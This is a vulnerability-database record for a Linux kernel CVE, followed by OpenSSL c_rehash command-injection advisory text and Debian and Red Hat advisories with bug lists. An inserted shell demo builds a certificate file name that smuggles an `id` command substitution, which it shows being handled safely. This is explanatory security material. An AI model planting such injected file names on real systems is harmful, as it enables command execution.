"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-26558"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-12655"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20292"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28972"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36322"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-5995"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3564"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33098"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25670"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5343-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-25673"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33033"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-28688"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-20317"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-29650"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-3483"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2020-36385"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-19449"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2016-2854"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.4.0-1046.49"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.4.0-1048.52"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop/5.4.0-1018.19"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.4.0-1038.41"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke-5.4/5.4.0-1046.48~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gkeop-5.4/5.4.0-1018.19~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.4/5.4.0-77.86~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi-5.4/5.4.0-1038.41~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.4.0-77.86"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.4.0-1051.53"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.4/5.4.0-1046.49~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.4/5.4.0-1051.53~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.4/5.4.0-1048.52~18.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gke/5.4.0-1046.48"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5000-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.4.0-1041.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-4997-2"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.11.0-1010.10"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.11.0-1011.11"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.11.0-1012.13"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.11.0-1011.12"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.11.0-1009.9"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.11.0-22.23"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-hwe-5.8/5.8.0-63.71~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/5.8.0-1041.43"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp/5.8.0-1038.40"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5016-1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws-5.8/5.8.0-1041.43~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/5.8.0-63.71"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-33909"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle-5.8/5.8.0-1037.38~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure/5.8.0-1039.42"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-raspi/5.8.0-1032.35"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/5.8.0-1037.38"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-5.8/5.8.0-1039.42~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/5.8.0-1033.36"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-5.8/5.8.0-1038.40~20.04.1"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-azure-4.15/4.15.0-1134.147"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-snapdragon/4.15.0-1123.132"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-gcp-4.15/4.15.0-1119.133"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-44733"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-dell300x/4.15.0-1038.43"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-43976"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux/4.15.0-173.182"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-aws/4.15.0-1124.133"
},
{
"trust": 0.1,
"url": "https://ubuntu.com/security/notices/usn-5339-1"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0435"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2021-45095"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-oracle/4.15.0-1090.99"
},
{
"trust": 0.1,
"url": "https://launchpad.net/ubuntu/+source/linux-kvm/4.15.0-1110.113"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2022-0492"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-391284"
},
{
"db": "VULMON",
"id": "CVE-2021-3506"
},
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
},
{
"db": "NVD",
"id": "CVE-2021-3506"
}
]
},
"sources": {
"_id": null,
"data": [
{
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166417",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "163597",
"ident": null
},
{
"db": "PACKETSTORM",
"id": "166400",
"ident": null
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"sources_release_date": {
"_id": null,
"data": [
{
"date": "2021-04-19T00:00:00",
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"date": "2022-03-23T16:02:30",
"db": "PACKETSTORM",
"id": "166417",
"ident": null
},
{
"date": "2021-06-23T15:38:23",
"db": "PACKETSTORM",
"id": "163253",
"ident": null
},
{
"date": "2021-06-27T12:22:22",
"db": "PACKETSTORM",
"id": "163291",
"ident": null
},
{
"date": "2021-06-28T16:22:26",
"db": "PACKETSTORM",
"id": "163301",
"ident": null
},
{
"date": "2021-06-23T15:33:13",
"db": "PACKETSTORM",
"id": "163249",
"ident": null
},
{
"date": "2021-07-21T16:04:29",
"db": "PACKETSTORM",
"id": "163597",
"ident": null
},
{
"date": "2022-03-22T15:35:42",
"db": "PACKETSTORM",
"id": "166400",
"ident": null
},
{
"date": "2021-04-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"date": "2021-12-22T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"date": "2021-04-19T22:15:13.110000",
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"sources_update_date": {
"_id": null,
"data": [
{
"date": "2022-01-21T00:00:00",
"db": "VULHUB",
"id": "VHN-391284",
"ident": null
},
{
"date": "2021-05-08T00:00:00",
"db": "VULMON",
"id": "CVE-2021-3506",
"ident": null
},
{
"date": "2022-03-24T00:00:00",
"db": "CNNVD",
"id": "CNNVD-202104-1357",
"ident": null
},
{
"date": "2024-11-19T02:38:00",
"db": "JVNDB",
"id": "JVNDB-2021-005924",
"ident": null
},
{
"date": "2024-11-21T06:21:42.427000",
"db": "NVD",
"id": "CVE-2021-3506",
"ident": null
}
]
},
"threat_type": {
"_id": null,
"data": "local",
"sources": [
{
"db": "PACKETSTORM",
"id": "166417"
},
{
"db": "PACKETSTORM",
"id": "163253"
},
{
"db": "PACKETSTORM",
"id": "163291"
},
{
"db": "PACKETSTORM",
"id": "163301"
},
{
"db": "PACKETSTORM",
"id": "163249"
},
{
"db": "PACKETSTORM",
"id": "163597"
},
{
"db": "PACKETSTORM",
"id": "166400"
},
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
}
],
"trust": 1.3
},
"title": {
"_id": null,
"data": "Out-of-bounds read vulnerability in Linux\u00a0Kernel",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2021-005924"
}
],
"trust": 0.8
},
"type": {
"_id": null,
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-202104-1357"
}
],
"trust": 0.6
}
}
VAR-202206-1428
Vulnerability from variot - Updated: 2026-03-09 20:23
In addition to the c_rehash shell command injection identified in CVE-2022-1292, further circumstances where the c_rehash script does not properly sanitise shell metacharacters to prevent command injection were found by code review. When CVE-2022-1292 was fixed, it was not discovered that there are other places in the script where the file names of certificates being hashed were possibly passed to a command executed through the shell. This script is distributed by some operating systems in a manner where it is automatically executed. On such operating systems, an attacker could execute arbitrary commands with the privileges of the script. Use of the c_rehash script is considered obsolete and should be replaced by the OpenSSL rehash command line tool. Fixed in OpenSSL 3.0.4 (Affected 3.0.0, 3.0.1, 3.0.2, 3.0.3). Fixed in OpenSSL 1.1.1p (Affected 1.1.1-1.1.1o). Fixed in OpenSSL 1.0.2zf (Affected 1.0.2-1.0.2ze). (CVE-2022-2068). Description:
Red Hat Ceph Storage is a scalable, open, software-defined storage platform that combines the most stable version of the Ceph storage system with a Ceph management platform, deployment utilities, and support services.
Space precludes documenting all of these changes in this advisory. Bugs fixed (https://bugzilla.redhat.com/):
2031228 - CVE-2021-43813 grafana: directory traversal vulnerability 2044628 - CVE-2022-21673 grafana: Forward OAuth Identity Token can allow users to access some data sources 2115198 - build ceph containers for RHCS 5.2 release
For the oldstable distribution (buster), this problem has been fixed in version 1.1.1n-0+deb10u3.
For the stable distribution (bullseye), this problem has been fixed in version 1.1.1n-0+deb11u3.
We recommend that you upgrade your openssl packages.
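As a rough way to check whether a given system already carries the fixed package, the Debian version strings can be compared. This is only a sketch: the `installed` value below is a hypothetical example (on a real system it would come from `dpkg-query`), and `sort -V` merely approximates dpkg's ordering — `dpkg --compare-versions` is the authoritative tool.

```shell
# Sketch: compare an installed openssl version against the fixed
# bullseye version from the advisory (1.1.1n-0+deb11u3).
fixed='1.1.1n-0+deb11u3'
installed='1.1.1n-0+deb11u1'   # hypothetical; real value: dpkg-query -W -f '${Version}' openssl

# sort -V orders the two version strings; if the installed version
# sorts first and differs from the fixed one, it is older.
lowest=$(printf '%s\n%s\n' "$fixed" "$installed" | sort -V | head -n1)
if [ "$lowest" = "$installed" ] && [ "$installed" != "$fixed" ]; then
    echo "openssl needs upgrading"
else
    echo "openssl is up to date"
fi
```

With the example values above, the installed 1.1.1n-0+deb11u1 predates the fix, so the check reports that an upgrade is needed.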
For the detailed security status of openssl please refer to its security tracker page at: https://security-tracker.debian.org/tracker/openssl
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org .
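The bug class behind CVE-2022-2068 can be sketched in a few lines of shell; the filename below is a hypothetical example, not taken from the advisory. Had a script expanded it unquoted inside a shell command line, the embedded backticks would run as a command substitution; quoting the expansion keeps the metacharacters literal.

```shell
# Hypothetical demo of the c_rehash bug class (CVE-2022-2068): a
# certificate filename carrying shell metacharacters.
demo=$(mktemp -d)
touch "$demo"/'cert`id`.pem'    # filename with an embedded `id` command substitution

for f in "$demo"/*.pem; do
    # SAFE handling: "$f" is quoted, so the backticks stay literal
    # text and `id` is never executed.
    printf 'hashing: %s\n' "$f"
done
rm -rf "$demo"
```

As the advisory notes, the supported replacement is the built-in `openssl rehash <directory>` subcommand, which hashes a certificate directory without routing file names through a shell.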
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Description:
Logging Subsystem 5.5.0 - Red Hat OpenShift
Security Fix(es):
- kubeclient: kubeconfig parsing error can lead to MITM attacks (CVE-2022-0759)
- golang: compress/gzip: stack exhaustion in Reader.Read (CVE-2022-30631)
- golang: out-of-bounds read in golang.org/x/text/language leads to DoS (CVE-2021-38561)
- prometheus/client_golang: Denial of service using InstrumentHandlerCounter (CVE-2022-21698)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
2045880 - CVE-2022-21698 prometheus/client_golang: Denial of service using InstrumentHandlerCounter 2058404 - CVE-2022-0759 kubeclient: kubeconfig parsing error can lead to MITM attacks 2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS 2107342 - CVE-2022-30631 golang: compress/gzip: stack exhaustion in Reader.Read
- JIRA issues fixed (https://issues.jboss.org/):
LOG-1415 - Allow users to tune fluentd
LOG-1539 - Events and CLO csv are not collected after running oc adm must-gather --image=$downstream-clo-image
LOG-1713 - Reduce Permissions granted for prometheus-k8s service account
LOG-2063 - Collector pods fail to start when a Vector only Cluster Logging instance is created.
LOG-2134 - The infra logs are sent to app-xx indices
LOG-2159 - Cluster Logging Pods in CrashLoopBackOff
LOG-2165 - [Vector] Default log level debug makes it hard to find useful error/failure messages.
LOG-2167 - [Vector] Collector pods fails to start with configuration error when using Kafka SASL over SSL
LOG-2169 - [Vector] Logs not being sent to Kafka with SASL plaintext.
LOG-2172 - [vector]The openshift-apiserver and ovn audit logs can not be collected.
LOG-2242 - Log file metric exporter is still following /var/log/containers files.
LOG-2243 - grafana-dashboard-cluster-logging should be deleted once clusterlogging/instance was removed
LOG-2264 - Logging link should contain an icon
LOG-2274 - [Logging 5.5] EO doesn't recreate secrets kibana and kibana-proxy after removing them.
LOG-2276 - Fluent config format is hard to read via configmap
LOG-2290 - ClusterLogging Instance status in not getting updated in UI
LOG-2291 - [release-5.5] Events listing out of order in Kibana 6.8.1
LOG-2294 - [Vector] Vector internal metrics are not exposed via HTTPS due to which OpenShift Monitoring Prometheus service cannot scrape the metrics endpoint.
LOG-2300 - [Logging 5.5]ES pods can't be ready after removing secret/signing-elasticsearch
LOG-2303 - [Logging 5.5] Elasticsearch cluster upgrade stuck
LOG-2308 - configmap grafana-dashboard-elasticsearch is being created and deleted continously
LOG-2333 - Journal logs not reaching Elasticsearch output
LOG-2337 - [Vector] Missing @ prefix from the timestamp field in log record.
LOG-2342 - [Logging 5.5] Kibana pod can't connect to ES cluster after removing secret/signing-elasticsearch: "x509: certificate signed by unknown authority"
LOG-2384 - Provide a method to get authenticated from GCP
LOG-2411 - [Vector] Audit logs forwarding not working.
LOG-2412 - CLO's loki output url is parsed wrongly
LOG-2413 - PriorityClass cluster-logging is deleted if provide an invalid log type
LOG-2418 - EO supported time units don't match the units specified in CRDs.
LOG-2439 - Telemetry: the managedStatus&healthStatus&version values are wrong
LOG-2440 - [loki-operator] Live tail of logs does not work on OpenShift
LOG-2444 - The write index is removed when the size of the index > diskThresholdPercent% * total size.
LOG-2460 - [Vector] Collector pods fail to start on a FIPS enabled cluster.
LOG-2461 - [Vector] Vector auth config not generated when user provided bearer token is used in a secret for connecting to LokiStack.
LOG-2463 - Elasticsearch operator repeatedly prints error message when checking indices
LOG-2474 - EO shouldn't grant cluster-wide permission to system:serviceaccount:openshift-monitoring:prometheus-k8s when ES cluster is deployed. [openshift-logging 5.5]
LOG-2522 - CLO supported time units don't match the units specified in CRDs.
LOG-2525 - The container's logs are not sent to separate index if the annotation is added after the pod is ready.
LOG-2546 - TLS handshake error on loki-gateway for FIPS cluster
LOG-2549 - [Vector] [master] Journald logs not sent to the Log store when using Vector as collector.
LOG-2554 - [Vector] [master] Fallback index is not used when structuredTypeKey is missing from JSON log data
LOG-2588 - FluentdQueueLengthIncreasing rule failing to be evaluated.
LOG-2596 - [vector]the condition in [transforms.route_container_logs] is inaccurate
LOG-2599 - Supported values for level field don't match documentation
LOG-2605 - $labels.instance is empty in the message when firing FluentdNodeDown alert
LOG-2609 - fluentd and vector are unable to ship logs to elasticsearch when cluster-wide proxy is in effect
LOG-2619 - containers violate PodSecurity -- Log Exploration
LOG-2627 - containers violate PodSecurity -- Loki
LOG-2649 - Level Critical should match the beginning of the line as the other levels
LOG-2656 - Logging uses deprecated v1beta1 apis
LOG-2664 - Deprecated Feature logs causing too much noise
LOG-2665 - [Logging 5.5] Sometimes collector fails to push logs to Elasticsearch cluster
LOG-2693 - Integration with Jaeger fails for ServiceMonitor
LOG-2700 - [Vector] vector container can't start due to "unknown field pod_annotation_fields" .
LOG-2703 - Collector DaemonSet is not removed when CLF is deleted for fluentd/vector only CL instance
LOG-2725 - Upgrade logging-eventrouter Golang version and tags
LOG-2731 - CLO keeps reporting Reconcile ServiceMonitor retry error and Reconcile Service retry error after creating clusterlogging.
LOG-2732 - Prometheus Operator pod throws 'skipping servicemonitor' error on Jaeger integration
LOG-2742 - unrecognized outputs when using the sts role secret
LOG-2746 - CloudWatch forwarding rejecting large log events, fills tmpfs
LOG-2749 - OpenShift Logging Dashboard for Elastic Shards shows "active_primary" instead of "active" shards.
LOG-2753 - Update Grafana configuration for LokiStack integration on grafana/loki repo
LOG-2763 - [Vector]{Master} Vector's healthcheck fails when forwarding logs to Lokistack.
LOG-2764 - ElasticSearch operator does not respect referencePolicy when selecting oauth-proxy image
LOG-2765 - ingester pod can not be started in IPv6 cluster
LOG-2766 - [vector] failed to parse cluster url: invalid authority IPv6 http-proxy
LOG-2772 - arn validation failed when role_arn=arn:aws-us-gov:xxx
LOG-2773 - No cluster-logging-operator-metrics service in logging 5.5
LOG-2778 - [Vector] [OCP 4.11] SA token not added to Vector config when connecting to LokiStack instance without CLF creds secret required by LokiStack.
LOG-2784 - Japanese log messages are garbled at Kibana
LOG-2793 - [Vector] OVN audit logs are missing the level field.
LOG-2864 - [vector] Can not sent logs to default when loki is the default output in CLF
LOG-2867 - [fluentd] All logs are sent to application tenant when loki is used as default logstore in CLF.
LOG-2873 - [Vector] Cannot configure CPU/Memory requests/limits when using Vector as collector.
LOG-2875 - Seeing a black rectangle box on the graph in Logs view
LOG-2876 - The link to the 'Container details' page on the 'Logs' screen throws error
LOG-2877 - When there is no query entered, seeing error message on the Logs view
LOG-2882 - RefreshIntervalDropdown and TimeRangeDropdown always set back to its original values when switching between pages in 'Logs' screen
- References:
https://access.redhat.com/security/cve/CVE-2021-38561
https://access.redhat.com/security/cve/CVE-2022-0759
https://access.redhat.com/security/cve/CVE-2022-1012
https://access.redhat.com/security/cve/CVE-2022-1292
https://access.redhat.com/security/cve/CVE-2022-1586
https://access.redhat.com/security/cve/CVE-2022-1785
https://access.redhat.com/security/cve/CVE-2022-1897
https://access.redhat.com/security/cve/CVE-2022-1927
https://access.redhat.com/security/cve/CVE-2022-2068
https://access.redhat.com/security/cve/CVE-2022-2097
https://access.redhat.com/security/cve/CVE-2022-21698
https://access.redhat.com/security/cve/CVE-2022-30631
https://access.redhat.com/security/cve/CVE-2022-32250
https://access.redhat.com/security/updates/classification/#important
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2022 Red Hat, Inc.
Summary:
Red Hat OpenShift Virtualization release 4.12 is now available with updates to packages and images that fix several bugs and add enhancements.
Description:
OpenShift Virtualization is Red Hat's virtualization solution designed for Red Hat OpenShift Container Platform.
RHEL-8-CNV-4.12
=============
bridge-marker-container-v4.12.0-24
cluster-network-addons-operator-container-v4.12.0-24
cnv-containernetworking-plugins-container-v4.12.0-24
cnv-must-gather-container-v4.12.0-58
hco-bundle-registry-container-v4.12.0-769
hostpath-csi-driver-container-v4.12.0-30
hostpath-provisioner-container-v4.12.0-30
hostpath-provisioner-operator-container-v4.12.0-31
hyperconverged-cluster-operator-container-v4.12.0-96
hyperconverged-cluster-webhook-container-v4.12.0-96
kubemacpool-container-v4.12.0-24
kubevirt-console-plugin-container-v4.12.0-182
kubevirt-ssp-operator-container-v4.12.0-64
kubevirt-tekton-tasks-cleanup-vm-container-v4.12.0-55
kubevirt-tekton-tasks-copy-template-container-v4.12.0-55
kubevirt-tekton-tasks-create-datavolume-container-v4.12.0-55
kubevirt-tekton-tasks-create-vm-from-template-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-customize-container-v4.12.0-55
kubevirt-tekton-tasks-disk-virt-sysprep-container-v4.12.0-55
kubevirt-tekton-tasks-modify-vm-template-container-v4.12.0-55
kubevirt-tekton-tasks-operator-container-v4.12.0-40
kubevirt-tekton-tasks-wait-for-vmi-status-container-v4.12.0-55
kubevirt-template-validator-container-v4.12.0-32
libguestfs-tools-container-v4.12.0-255
ovs-cni-marker-container-v4.12.0-24
ovs-cni-plugin-container-v4.12.0-24
virt-api-container-v4.12.0-255
virt-artifacts-server-container-v4.12.0-255
virt-cdi-apiserver-container-v4.12.0-72
virt-cdi-cloner-container-v4.12.0-72
virt-cdi-controller-container-v4.12.0-72
virt-cdi-importer-container-v4.12.0-72
virt-cdi-operator-container-v4.12.0-72
virt-cdi-uploadproxy-container-v4.12.0-71
virt-cdi-uploadserver-container-v4.12.0-72
virt-controller-container-v4.12.0-255
virt-exportproxy-container-v4.12.0-255
virt-exportserver-container-v4.12.0-255
virt-handler-container-v4.12.0-255
virt-launcher-container-v4.12.0-255
virt-operator-container-v4.12.0-255
virtio-win-container-v4.12.0-10
vm-network-latency-checkup-container-v4.12.0-89
- Bugs fixed (https://bugzilla.redhat.com/):
1719190 - Unable to cancel live-migration if virt-launcher pod in pending state
2023393 - [CNV] [UI]Additional information needed for cloning when default storageclass in not defined in target datavolume
2030801 - CVE-2021-44716 golang: net/http: limit growth of header canonicalization cache
2030806 - CVE-2021-44717 golang: syscall: don't close fd 0 on ForkExec error
2040377 - Unable to delete failed VMIM after VM deleted
2046298 - mdevs not configured with drivers installed, if mdev config added to HCO CR before drivers are installed
2052556 - Metric "kubevirt_num_virt_handlers_by_node_running_virt_launcher" reporting incorrect value
2053429 - CVE-2022-23806 golang: crypto/elliptic: IsOnCurve returns true for invalid field elements
2053532 - CVE-2022-23772 golang: math/big: uncontrolled memory consumption due to an unhandled overflow via Rat.SetString
2053541 - CVE-2022-23773 golang: cmd/go: misinterpretation of branch names can lead to incorrect access control
2060499 - [RFE] Cannot add additional service (or other objects) to VM template
2069098 - Large scale |VMs migration is slow due to low migration parallelism
2070366 - VM Snapshot Restore hangs indefinitely when backed by a snapshotclass
2071491 - Storage Throughput metrics are incorrect in Overview
2072797 - Metrics in Virtualization -> Overview period is not clear or configurable
2072821 - Top Consumers of Storage Traffic in Kubevirt Dashboard giving unexpected numbers
2079916 - KubeVirt CR seems to be in DeploymentInProgress state and not recovering
2084085 - CVE-2022-29526 golang: syscall: faccessat checks wrong group
2086285 - [dark mode] VirtualMachine - in the Utilization card the percentages and the graphs not visible enough in dark mode
2086551 - Min CPU feature found in labels
2087724 - Default template show no boot source even there are auto-upload boot sources
2088129 - [SSP] webhook does not comply with restricted security context
2088464 - [CDI] cdi-deployment does not comply with restricted security context
2089391 - Import gzipped raw file causes image to be downloaded and uncompressed to TMPDIR
2089744 - HCO should label its control plane namespace to admit pods at privileged security level
2089751 - 4.12.0 containers
2089804 - 4.12.0 rpms
2091856 - 'Edit BootSource' action should have more explicit information when disabled
2092793 - CVE-2022-30629 golang: crypto/tls: session tickets lack random ticket_age_add
2092796 - [RFE] CPU|Memory display in the template card is not consistent with the display in the template drawer
2093771 - The disk source should be PVC if the template has no auto-update boot source
2093996 - kubectl get vmi API should always return primary interface if exist
2094202 - Cloud-init username field should have hint
2096285 - KubeVirt CR API documentation is missing docs for many fields
2096780 - [RFE] Add ssh-key and sysprep to template scripts tab
2097436 - Online disk expansion ignores filesystem overhead change
2097586 - AccessMode should stay on ReadWriteOnce while editing a disk with storage class HPP
2099556 - [RFE] Add option to enable RDP service for windows vm
2099573 - [RFE] Improve template's message about not editable
2099923 - [RFE] Merge "SSH access" and "SSH command" into one
2100290 - Error is not dismissed on catalog review page
2100436 - VM list filtering ignores VMs in error-states
2100442 - [RFE] allow enabling and disabling SSH service while VM is shut down
2100495 - CVE-2021-38561 golang: out-of-bounds read in golang.org/x/text/language leads to DoS
2100629 - Update nested support KBASE article
2100679 - The number of hardware devices is not correct in vm overview tab
2100682 - All hardware devices get deleted while just delete one
2100684 - Workload profile are not editable during creation and after creation
2101144 - VM filter has two "Other" checkboxes which are triggered together
2101164 - [dark mode] Number of alerts in Alerts card not visible enough in dark mode
2101167 - Edit buttons clickable area is too large.
2101333 - [e2e] elements on Template Scheduling tab are missing proper data-test-id
2101335 - Clone action enabled in VM list kebab button for a VM in CrashLoopBackOff state
2101390 - Easy to miss the "tick" when adding GPU device to vm via UI
2101394 - [e2e] elements on VM Scripts tab are missing proper data-test-id
2101423 - wrong user name on using ignition
2101430 - Using CLOUD_USER_PASSWORD in Templates parameters breaks VM review page
2101445 - "Pending changes - Boot Order"
2101454 - Cannot add PVC boot source to template in 'Edit Boot Source Reference' view as a non-priv user
2101499 - Cannot add NIC to VM template as non-priv user
2101501 - NAME parameter in VM template has no effect.
2101628 - non-priv user cannot load dataSource while edit template's rootdisk
2101667 - VMI view is not aligned with VM and templates
2101681 - All templates are labeling "source available" in template list page
2102074 - VM Creation time on VM Overview Details card lacks string
2102125 - vm clone modal is displaying DV size instead of PVC size
2102132 - align the utilization card of single VM overview with the design
2102138 - Should the word "new" be removed from "Create new VirtualMachine from catalog"?
2102256 - Add button moved to right
2102448 - VM disk is deleted by uncheck "Delete disks (1x)" on delete modal
2102475 - Template 'vm-template-example' should be filtered by 'Fedora' rather than 'Other'
2102561 - sysprep-info should link to downstream doc
2102737 - Clone a VM should lead to vm overview tab
2102740 - "Save" button on vm clone modal should be "Clone"
2103806 - "404: Not Found" appears shortly by clicking the PVC link on vm disk tab
2103807 - PVC is not named by VM name while creating vm quickly
2103817 - Workload profile values in vm details should align with template's value
2103844 - VM nic model is empty
2104331 - VM list page scroll up automatically
2104402 - VM create button is not enabled while adding multiple environment disks
2104422 - Storage status report "OpenShift Data Foundation is not available" even the operator is installed
2104424 - Enable descheduler or hide it on template's scheduling tab
2104479 - [4.12] Cloned VM's snapshot restore fails if the source VM disk is deleted
2104480 - Alerts in VM overview tab disappeared after a few seconds
